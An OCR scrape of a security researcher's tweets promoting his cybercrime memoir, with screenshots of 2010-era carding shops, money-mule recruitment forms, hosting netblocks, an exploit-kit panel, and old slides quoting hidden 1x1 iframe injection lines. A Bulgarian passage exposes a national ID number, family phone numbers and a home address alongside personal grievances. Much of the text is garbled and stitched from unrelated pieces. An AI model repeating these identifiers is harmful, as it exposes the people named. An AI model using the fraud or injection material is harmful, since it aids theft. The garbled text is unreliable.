feature this on the front page? - https://t.co/mfznqmBl4Q [PDF] as | believe it would 
be extremely informative and relevant for your readers. Regards. Dancho 


*1 
10:46 


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware #CyberSecurity 
#Threatintel #threathunting https://t.co/G230V6zvPm 
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10:46 


= Chapter 1 


Cyber 
Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchey 
The RON, The Kooblace Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns inchxting Botnet and 
Money Mule Recruliment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https //ddanchev blogspot.com 


Dancho Danchev 


= #€ A@ < 


Chapters Notebook Search Share Settings 


https://t.co/JTcqOaYgET https://t.co/DjNVvxhO3D 
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Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 


Views 


150K 
125K 


9.36M 


100K 


75K 


25K 


Jan 2011 Jan Jan Jan Jan Jan Jan Jan Jan 
2012 2013 2014 2015 2016 2017 2018 2019 


10:48 


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware #Threatintel 
#threathunting https://t.co/vGjoUHz4nD 
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Cyber 
Intelligence 


10:49 


Who wants access to this? - https://t.co/JTcqOaYgET - drop me a line at 
dancho.danchev@hush.com https://t.co/U8cY820DZe 


21 ¥*1 
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11:14 


Check this out! - https://t.co/JTcqOaYgET #security #cybercrime #malware 
https://t.co/pDviX2gLXr 
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Lit 


Kazvam se Dancho Danchev svetoven specialist v sferata na borbata s 
kiber prestupnosta dete sum s EGN: 8311226968 I mobilen telefon 
+35987689389@ ot Troyan I mobilen telefon na moqta maika - +359886124919 
I dnes reshih da podam signal otnosno sebe si I nezakonen nasilstven moi 
arest ot slujiteli na RPU Troyan v godinata 2@1@ s kradeni moi documenti 
koito prosto trqbvalo da predstavq I sus shteti v razmer na 85,0@@ leva 
or tormoz I lipsa na pravorazdavane I eventualen opit za otvlichane or 
mogta kushta v godinata 201@ ot sushtite slujiteli bez svideteli I bez 
pravorazdavane or strana na durjavata s cel da buda poseten ili privikan 
i da buda razpitan ot vashi slujiteli spored ugovorka Ili na mqsto na 
moi postognen adres koito e Dimiter Ikonomov 34 Street, Troyan, Bulgaria 
i dnes reshih da podam signal otnosno nezakonen arest otnasqsht se do 
men i posledvashta krajba i eventualno upoqvane na moi adres bez moe 
znanie s cel da buda poseten ili da buda privikan za izqsnqvane na 
obstogtelstva. 


V godinata 201@ nepoznato psihiatrichno bolno lice nahluva v kushtata v 
koqto jiveq i mi vadi documenti s drugo lice koeto go chaka na stulbite 
v kushti s ideqta da se vidim. Na sledvashtiq den policeiski sluhiteli 
ot RPU Troyan nahluvat v staqta v koqto jiveq i me izdurpvat nasila bez 
svideteli i mi pokazvat kopie na lichnata mi karta koeto ne sum 
predostavql i me vodqt s kola v neizqsnena posoka bez da e davane 
obqsnenie za zadurjaneto mi. Po putq pishat gorivoto na kolata s koqto 
sme na firma Lesoplast kogeto e firmata na maika mi i bashta mi kudeto 
te sa bili slujiteli predi godini sled koeto me otvqjdat v neizqsnena 
posoka v sgrada v grad Lovech i me vodqt pri chovek koito ne poznavam i 
stoim i ne mi se dava obqsnenie za zadurjaneto mi sled koeto ne karat da 
si pokaja lichnata karta pred moite roditeli i da se podpisha i me 
zakluchvat v karcer v sgradata za period ot nqkolko meseca kato mi 
zakluchvat documentite i telefona i mi vzimat wryzkite na obuvkite i 
kolana bez da mi e davano obqsnenie za zadurjaneto mi. 


Prikachvam jalba koqto sum zapochnal da pisha v godinata 2016 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 
e arestuval nezakonno i me e izdurpal ot u nas s otkradnati documenti 
nasila i bez svidelite v godinat-a 2@1@ kato dnes sme 2021. 


https://t.co/JIcqOaYgET #security #cybercrime #malware https://t.co/GT7mJBYQwE 


Hi Dancho. 


Are you alive? :) 
I just got this email. 


Best regards, 

Dmitry Bestuzhev 

Senior Regional Researcher, Latin America 
Global Research and Analysis Team 
Kaspersky Lab 

Key ID: 4096/0xE4D1B9CE 
http://www.kaspersky.com 
http://www.securelist.com 
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11:15 
https://t.co/JTcqOaYgET #security #cybercrime #malware https://t.co/qv7kwSUwCM 


Hi Dancho, 
I have been falling the concern about your whereabouts and wanted to see if you were reachable. 
best, 
John Markoff 
He Ba 


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware 
https://t.co/CZBYizaC6B 


LOVELY HORSE @ 
@iovelyhorse A 


11:18 


Who wants access to this? - https://t.co/JTcqOaYgET drop me a line at 
dancho.danchev@hush.com https://t.co/DHyAGKmT6z 
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Enjoy the world’s most extensive and in-depth SNA (Social Network Analysis) of Iran’s 
hacker scene using @MaltegoHQ courtesy of me - https://t.co/zg7gV6K5Q1 [RAR] 
including a busted FBI’s Most Wanted Cybercriminal using OSINT. 
https://t.co/ZClsAeKmTI 


' 


11:21 


Remember BakaSoftware? Remember the glorious days of scareware also known as 
rogue security software when we used to truly rock the boat in terms of taking them 
offline and reporting their activities? Keep it coming! - https://t.co/JTcqOaYgET 


https://t.co/dOkF3wAB31 
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11:23 


Remember my work on the Koobface botnet? Check out my Keynote presentation at 
@CyberCamp 2016 - https://t.co/Ivjfw9emTb [MPEG4] - https://t.co/JTcqOaYgET 
https://t.co/KM1njncp42 


HNNCast052110 


Ei Like Share ¥ Flag as objectionable or broken - 1 Views - 1 Collector 


11:25 


Did you know that a have my own vinyl courtesy of a Canadian industrial artist? Grab 
a copy today - https://t.co/zhtnSGqaqaPa - https://t.co/JIcqOaYgET 
https://t.co/osYvoYSS9Z 


Sted Loe 
SUCK MY DICK 


11:25 
https://t.co/UZ6qVANxVF #security #cybercrime #malware https://t.co/fGTLLVO1Ij 
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Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understanding 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


11:26 
https://t.co/UZ6qVANXxVF #security #cybercrime #malware https://t.co/v49pgDU99N 
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r 
Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


23:20 
https://t.co/ZOonYBBIEC - #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/aSL3S1hRJW #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/GPKHONF1Wo #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/sOqge8dv07Z #security #cybercrime #malware #CyberSecurity 
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#cyberattacks #Threatintelligence #Threatintel 


9 - Thursday 


05:41 
https://t.co/eU0771qTjm #security #cybercrime #malware 


2 
05:42 

https://t.co/9NpdxoYbUU #security #cybercrime #malware 
05:42 

https://t.co/P7qMH2tEaO #security #cybercrime #malware 
05:47 


Looks like I just made it to the front page at - https://t.co/FnnUHQE1YP thanks a lot 
@Cryptome_org for featuring my "Cyber Intelligence" memoir - 
https://t.co/6V8OFTdlSv [PDF] happy reading and stay tuned for the second edition! 
Regards. Dancho https://t.co/I7xUQfcpoS 


*1 


2022-022. pdf Cyber Intelligence - Danchev Memoir, June 8, 2022 


21:13 


Folks. Check this out! - "Apply for Access to the Law Enforcement Nautilus Feed" - 
https://t.co/VuSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #threathunting #threatintel CC: @whoisxmlapi 
https://t.co/YMs920ZQO1 


2 *1 
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(G) Whois API Login Sign Up 


@) Law Enforcement Nautilus Feed Relatedlinks v 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOls) linked to major malicious 
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 


process by applying for access. 


11 - Saturday 


01:02 


https://t.co/VuSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #cyberthreats #CyberSec #cybersecuritytips 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/SJ6WJQOYNO 
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© Whois API Login Sign Up 


@) Law Enforcement Nautilus Feed Related links 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOls) linked to major malicious 
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 


process by applying for access. 


09:34 


https://t.co/Vv4nwa4tzj #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #CyberSec #cyberwar #CyberWarrior 
#ThreatHunting #Threatintelligence #threatintel https://t.co/OU3jIBptEU 
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12:46 
In retrospective - "| Know Who DDoS-ed Georgia Last Summer". Takes you back 


Vancno Vancnhev Is an expert in the Tleld of cybercnme 
fighting and threat intelligence gathering having actively 
pioneered his own methodology for processing threat 
intelligence leading to a successful set ofhundreds of 
high-quality analysis and research articles published at the 
industry's leading threat intelligence blog- ZDNet's Zero Day, 
Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's ThreatBlog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
The Register, NYTimes,CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and is 
currently considered one of the security industry's most 
popularsecurity publications. 


Key achievements include: 

- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse" 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 

- My old Twitter Account got 11,000 followers 

-| had an average of 7,000 RSS readers on my blog 

- [have my own vinyl "Blue Sabbath Black Cheer / Griefer - 
We Hate You Dancho Danchev" made by a Canadian artist 
- Currently running Astalavista.box.sk 

- | gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


doesn’t it? This is my modest experience with the now marketing leading social 
network analysis and multiple OSINT sources aggregation software tool Maltego. CC: 


*1 


@MaltegoHQ https://t.co/LLW4k7yvmZ 
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Re-shipping mules all the way baby! - https://t.co/uDr5P54stp #security #cybercrime 


100 


F) 


agrada ddos 


s & " u 
forum xaknetru forum. protogic.ws momuib.es forums tiblabr.com 
185 
cE “a “ “ : “ 
wow fssrru C . i 
forum.uinov.com —fero.portaihackernet = foro.elhacker.net exploltin 
“a a ae 
caballe.cat buy.moy.su br-linuxorg 


#malware #CyberAttack #ThreatHunting #Threatintelligence #Threatintel 
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Track Your Order 


Calculate Time and Cost 
Select a Country 


a 


Select a Region 
Westuwane — [s] 
Cakuiate 
Thane rv aporermetors and may nen be me mact orce We Ie 
ee 


Me predate how peng Ons bervee Homer 
uunwtector 


Contact us for more information 


630.889.1100 
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Re-shipping mules all the way baby! - Part Two - https://t.co/uDr5P54stp Images 


https://t.co/B9nDbUBrnE 


We ship your packages with care 
~"—_ on time, everytime. 


Overseas Shipping Specialist 


Meest-Chicago has become 8 dominant force in package delivery with services to Ukraine, 
Russia, Belanss, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan aed 
Arment. Our specialized transportation and logistics services to those countries lead the way 
as one of the most recognized brands in North America. 


Founded in 2001, Meest-Chicago, inc, a subsidiary of Meest Corporation Inc, is 8 package 
Gelivery company with services to Eastern Europe as welll as to all the countries of the former 
Soviet Union. Over the years, Meest-Chicago, Inc has grown into an industry leader by focusing 
on the goal of connecting customers in North America with thee families, fends and 
businesses in Eastern Europe. This also includes e-commerce between those countries. 

Today, Meest-Chicago has become a Gominant force in package Gelivery with services to 
Ukraine, Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan and Georgia Our 
spectalized transportation and logistics services to those countries lead the way a5 the most 
tecogeized bead in North America 


Our mission is to provide the best international package delivery service at the most 
Competitive price on the market using the latest technology. 


MEEST Chicago provides warehousing and consolidation services. Regacdiess of size. our 
efficiert warehousing solutions will give you the flexibility to meet changing demands of your 
business with reduced transportation and storage costs. We will pack, prepare and customize 
Your goods for cifferent market needs 


A wide network of representatives im the Untied States, Canada, Ukraine, and other countries 
allows us to be always accessible to our customers. To locate 8 representative in your area, 
please, call our toll free number (630) 889-1 100 


Working with MEEST CHICAGO can help you reduce the risks and costs due to our expertise in 
Customs clearance as well as regional transportation and logistics specifics in the countries 
of the former Soviet Union 


All company offices are joined by one sophisticated computer network that makes & possible 
for our customers to track the status of Your order at any time 


courtesy of me while doing research. #security #cybercrime #malware 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/KYI6VtOiiB 
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BUSINESS AT THE SPEED OF LIFE 


WELCOME TO YOUR SHEPPING PANEL 


Your Shipping Panel LLC has become a dominant force in package delivery with services 


over the World. Our specialized transportation and logistics services over all countries lead 
the way as one of the most recognized brands in North America. 


Mission Global Transport & Logistics 
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Sofia, Bulgaria. Circa 2010. Right before | got caught. Images courtesy of me. Back 
then | met with @rivarichmond to discuss my findings and research on the Koobface 
botnet. What a time it was. | even made it into the NYTimes - 
https://t.co/uW1LOBMgsXM https://t.co/tlgqPOcNJhW 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
based on my research on credit cards selling E-Shops at the time. #security 
#cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/VyvnWFXlax 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/jzvreVzYal 


Home | Search Cards! Checkout | My orders | Balance: So,.00 | Support | Account | Service Rules | Help | Logou 


Load funds: 
Liberty Reserve: [ 


Statistic: 
Out of stock. 
_> 
Cvv 

Country Price Qt. 
Ag $10,00 i 
Au $8,00 i2 
Be $10,00 i 
Br $7,00 $3 
Ca $7,00 6 
Cn $10,00 2 
Co $10,00 3 
Es $10,00 3 
Fr $10,00 3 
Gb $9,00 1 
in $5,00 7 
Kr $8,00 i 
Mx $10,00 2 
Nl $10,00 2 
Nz $7,00 i 
Rj $10,00 2 
Sa $10,00 i 
Tr $6,00 i 
Uk $9,00 122 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/wn8lleOkQK 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzZEzsHp]lk 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/5ig4 LAWCcA 
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AS. aS3,537 


NET 


NEI 193.227.240.0/23 AS. aS35718 


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/rLA5puAb66 
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ns1,1000dns,net 


f 
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212,113.32,0/19 
NET. 


PTE. 212.113.36.21.dc.ukrtelecom.ua 


4. 91.223.775 


AS 


AS 
wee AS68849 
NET 212.213.48,0/20 
PTR 
ut2.antiddos.org 
NET 85.17.0.0/16 AS. AS16265 


PTR 


hosted-byleaseweb.com 4 $5.17.134.129 


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/oAXzO081QVC 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/FgZWPfWUji 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/Ghm04aPsZK 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/OebJnet4wa 


Checker 
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(EWS GATEWAY IE GATEWAY2 ADOFUNDS HISTORY SUPPORT SINBASE AUTH CODES REGION SINS LOGOUT 
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Re ARE 
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0 35 OOOO OOOO = Hihiyy 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM 
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#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/DdU5QIESVt 


Neto, wy 2 tems for $0 


Donen: Sate % PERFECT-NUMBERS.cCC 
Main Dumps Toots Checker Purchased Notifier Refill Balance fl Tickets (010) Y Profte [Rules [ Cart(0) | loot 


You can use our service only after you refill your balance! 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
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https://t.co/50SZnwl4Fo 


User login 


Username: You are not authorized to access this page 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/8qY6xFiwYL 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
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Remember TROYAK-AS? - https://t.co/jWmZOB4cDh Who would have thought? BGP 
over VPN? Outstanding. #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintel https://t.co/jQOGLLkOJv 
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Here’s a decent example of money mule recruitment gang that’s blocking access to 
my personal blog once a user installs their rogue certificate. - https://t.co/ytrCt6Gswl 
#security #cybercrime #malware #ThreatHunting #ThreatIntelligence #threatintel 
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https://t.co/FXeYZYS6Kn #security #cybercrime #malware #Threatintelligence 
#ThreatHunting #threatintel 
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22:37 
Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security 


#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel 
https://t.co/jaNIUOPuxX! 
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Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security 
#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel 
https://t.co/EWstxnNmRO 
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Why b Panama so attractive Our Services Careers 
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Transfer type: Western Union 
First Name: 

Last Name: 

City: 

Country: 

Reference Number (MTCN)*: 908 . 547 .5754 ? 
Western Union fee (USD)*: 600] 

First Name*: John 

Last Name*: Blackmore 
City*: New York 
Country*: United States 
Comments: 
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Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security 
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https://t.co/KPtY QCS8F8 


ISPSYSTEWAS elm) 
13.33% 


TimelNet (China) 
18.33% 


EUROACCESS (NL) 
18.33% 


VolumeDrive (U.S) 
18.33% 


KEYWEB-AS (Germany) 
1.67% 


Great Lakes Comnet (U.S) 
15.00% 


PoadPunner (U.S) 
15.00% 


http://ddanchev. blogspot.com 


22:40 


Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security 


#cybercrime #malware #ThreatIntelligence #ThreatHunting #threatintel 
https://t.co/Yq9fmb2gu6 
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Employee Registration - Step 4 


@°=@2020°0 


I confirm that I have contacted my bank directly and verified that: 


()_ my banking information (Account and Routing numbers) are correct. 
oO my daily withdrawal limit is in fact $10,000. 
()_ my current account listed is active, as it may become inactive due to inactivity. 


oO my account is able to receive funds on daily basis in the amount of $10,000. 


In addition I certify that: 


oO there is a branch of my bank located in my city/town and I am able to get there soon after task 
receipt. 


oO there are Western Union and Money Gram locations in my city/town and I am awere of their exact 
addresses. 


Next Step Back 


*If you have any doubts or concerns to the above statements, please post-pone your registration until all of the information is 
verified. You carry full liability for providing falsified information. 


**Please bear in mind the Confidentiality Clause in your Agreement when contacting outside parties for information. 


Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security 
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#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel 
https://t.co/WnTiqNEYIK 


HanmMenosanne Llena 


Brankn, dopmp!, Ta6nnybt 
Application form (ENG) $25.00 
Application form electron. (ENG) $20.00 
Application form short (ENG) $20.00 
ConpoBoguTenbHas dopma ana oTnpasneHiua MG (ENG) (ONE) $20.00 
ConpoBoguTenbHas dopma ana oTnpasneHusa MG (ENG) (SPLIT) $20.00 
ConpoBoguTenbHaa dopma ana oTnpasneHua WU (ENG) (ONE) $20.00 
ConpoBoguTenbHas dopma ana oTnpasneHua WU (ENG) (SPLIT) $25.00 
Espanol 
Formulario de Inscripcion (ESP) (.DOC) $35.00 
ConpoBoguTenbHas dopma ana oTnpasneHna WU (ESP) (SPLIT) $30.00 
®opma ana GaHKoBcKMx geTanen (ESP) (EEUU) $25.00 
®opma Ana oTNPaBNeHHOrO Nepesoga WU (ESP) $20.00 
Italian 
Application form (ITAL) $30.00 
ConposoguTenbHaa dopa ana oTnpasneHua WU (ITAL) $20.00 
®opma ana GaxKoBckix geTanen (ITAL) (EU) $25.00 
®opma gna oTNpaBNeHHOro nepesoga WU (ITAL) $25.00 
@opmbi ana GaHKoBCcKMx WeTanei 
Bank Details Form /IBAN/ (ENG) $25.00 
Bank Details Form /AU/ (ENG) $25.00 
Bank Details Form /CA/ (ENG) $25.00 
Bank Details Form /UK/ (ENG) $25.00 
Bank Details Form /US/ (ENG) $25.00 
14 - Tuesday 
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https://t.co/ry6rS4XdhS #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #cybersecuritytips #cyberwar #CyberSec 
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04:37 


https://t.co/ttyF3yred3 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #cybersecuritytips #CyberSec #cyberwar #Threatintel 
#threatintelligence 


10:47 
https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintelligence 


15 - Wednesday 


08:05 
Folks. | wanted to say big thanks to @whoisxmlapi for working with me to launch an 
807 


OpenCTI instance which | populate on a daily basis while working on the company’s 
Law Enforcement Nautilus Feed. Apply here - https://t.co/VuSMB6njx5 
https://t.co/ErAQGUx5Yx 


*1 


ce <A unnnwan 6 
: © Type MUS" Themed Emam Lead to Mateare 
Owens 


16 - Thursday 
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https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/WpJOEk208I 
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Underground - Who’s Who in 
Cyber Crime for 2007? 
iframe src=, {n404-1.htm width=1 height=1 ></iframe> 
iframe src=, /n404-2.htm width=1 height=1 ></iframe> 
iframe src=. {n404-3.htm width=1 height=1 ></iframe> 


iframe src=, /n404-4.htm width=1 height=1 ></iframe> 
iframe src=. /n404-S.htm width=1 height=1 ></iframe> 


iframe src=, /n404-6.htm width=1 height=1 ><j/iframe> 
iframe src=. /n404-7 htm width=1 height=1 ></iframe> 
iframe src=. /n404-8.htm width=1 height=1 ></iframe> 
iframe src=, /n404-9. htm width=1 height=1 ><j/iframe> 
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The Basics of OSINT/CYBERINT 


¢ What is OSINT and 
how important it is to 
fighting Cyber 
Crime? 

¢ Competitive 
Intelligence and 
OSINT 

¢ (CYBERINT) as the 
convergence of 
HUMINT, SIGINT 
and OSINT online 


02:34 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/WM5xPId2qw 
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The Basics of OSINT/CYBERINT 
- Cyber Intelligence Practices 


¢ Tactical Intelligence - “| Want to Know 
God’s Thoughts, all Rest are Details” 
* consolidation of malicious parties 
* assessing their degree of collaboration 
* personalizing and profiling the groups 
¢ Scenario Building Intelligence - Devil’s 
Advocate 
¢ Understanding of OPSEC 


02:34 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/OOo5sezWil 
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Dynamics of the Underground 
Economy 
¢ Customer Service, Manuals and Video Tutorials 


¢« Promotions and Bargain deals with commodity 
services and products 


¢« Exclusive, customer-tailored and proprietary 
tools/services 


¢ Localization to break the entry barriers 
¢ Risk-hedging and risk-forwarding 
¢« Customization of products/services 


¢ Botnets,Malware,Spamming,Phishing On 
Demand 


02:34 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/yOxIMHeTY5 
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United States-based credit card with card verification value 
United Kingdom-based credit card with card verification value 


An identity (including US bank account, credit card, date of birth, and 
government issued identification number) 


List of 29,000 emails 

Online banking account with a $9,900 balance 

Yahoo Mail cookie exploit—advertised to facilitate full access when successful 
Valid Yahoo and Hotmail email cookies 

Com promised computer 

Phishing Web site hosting—per site 

Verified PayPal account with balance (balance varies) 

Unverified PayPal account with balance (balance varies) 

Skype account 

World of Warcraft account—one month duration 


Table 3. Advertised prices of Items traded on underground economy servers 


Source: Symantec Comoration 


Advertised Price 
(in US Dollars) 


$1-$6 
$2-$12 
$14-$18 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/QYcMbudwub 
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Who’s Who in Cyber Crime for 
2007? - The Russian Business 
Network 
¢ Started issuing fake “account suspended 

notices” upon getting “blogosphered” 

The enemy you know is better than the 
enemy you don’t know - no OPSEC policy 
Centralization => efficiency and easy of 
management => easy to block/traceback 


Chasing down the RBN - how to breath 
down the RBN’s neck? 


02:35 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/fjmb2nctE0 
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Who’s Who in Cyber Crime for 
2007? - Stormy Wormy 


¢ Persistence, simplicity, and outdated 
vulnerabilities lead to the world’s largest 
botnet 


¢ Storm Worm is not an Attack, it’s a 
Campaign 

¢ Storm Worm is a Russian malware 
operation 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/ombkUJ9Gdx 
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Who’s Who in Cyber Crime for 
2007? - New Media Malware 


Gang 
¢ Domain farms of live exploit URLs, 
malware C&C 


¢« Have used and is still using RBN 
infrastructure 

¢ Connection with Storm Worm and several 
high profile malware embedded attacks 

¢ Same infrastructure is used by the RBN, 
Storm Worm and the New Media Malware 
Gang 


¢ A Russian malware group 
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Who’s Who in Cyber Crime for 
2007? - Ukrtelegroup Ltd 
Dispersed over several different netblocks 
- 86.200. 114."; 66.299:113.*; 88.259.94.."; 

88.255.120.": 

Huge farm for hosting malware, 
downloaders update locations, live exploit 
URLs, malware C&C 

¢ Cooperation with the RBN, Storm Worm 
Campaigners and the New Media Malware 
Gang 

Known RBN customers using their 
services 


02:36 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
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areyoufearless.com — X IE Exploiter v2 


IE Exploiter 


HE Expboter « 

t @rwomeal org) 

we start please note that net sl wersons off Internet Explerer are vurwersble to Ovs 
Sern (Eiawiaets Rie) tee | 


Ernode Server 


_ Loaded 31700 of 31744 bytes... 
_HItESC to cancel 


17.2 King 1 1E Exploiter Puaplac Edition Lx] 

KLAGIS JE EXPL@ITER | 

U0 sac# HNO — —COM 26) 3en Gall 
pony att 4 frew 4/eerves. com/ serves tom 


Example : “tip // Soerves . 
= : adkitall nfector 


; 


— SNC) Ar Ka OR Cl VT a BHR 


| Browse 
KP Lbs See Tm Tele’ tall KH SOSHA 
xm - —- ns  — Exit 
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818 


— THE HONEY NET PRO Ss £6 it- 


Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 


9c) ig) Baw Ry TAD eG 


G@ ae . ») 2) “aR 


Hate) |G) are: // 7) Ess 


PERMIT - unig) MM (Mit - unic 
IE XP ALI Sam 
Jukk Tine - be | 
Win2000 Eee 
Firefox - Siew 
era? MHU% - 0% 


BRSBAtew (tit) Mina 
MySQL -basud 
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{c) 2007 RLPRMRL 
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CTATMCTUKA 
Crameciv«a [ STATISTICS ] (| BROWSERS )( IPS ) [| CONFIG J [ CLEANUP | 
Toro fosyeere. Ox Crpere: 
Crpana Sanpocos Npobyece 
GERMANY » 4 (10.26% 
INTTED STATES 1% 86.15%) 
POLAND ix 16 (11.59%) 
LITHUANIA 1 0(0.00% 
a 1) ‘ 
3 
12 
ai) 
14 
ATION 13 
Un« ey 
RANE 1 
L SALVADOR 1 
ATW 1 0(0.00% 
SLOMBIA | 00.00% 
ROMANIA 2 00.0% 
DE? 3 
NEW 1 
AZERDAL 1 oe 
LOO MBOU 1 om.0D%) 
YPRLS 1 1(100.00%) 
MEXICO 3 00.00%) 
FINLAND 6 0(0,00%) 
JORDAN 1 0. 
ITALY 12 16.6 
WE THERLANE 10 sm 
MILE 1 010.00%) 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/Tsx8gBzUII 
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Conclusion and Key Summary 
Points 


¢ http://ddanchev.blogspot.com - 
switchboard to real-time and historical 
threat intell 


* dancho.danchev@gmail.com 


Thank you for your time and 
attention! 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/teDKr5 7ghT 
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Basics of MulesRecruitment 


¢ Requirements.to join the:group 
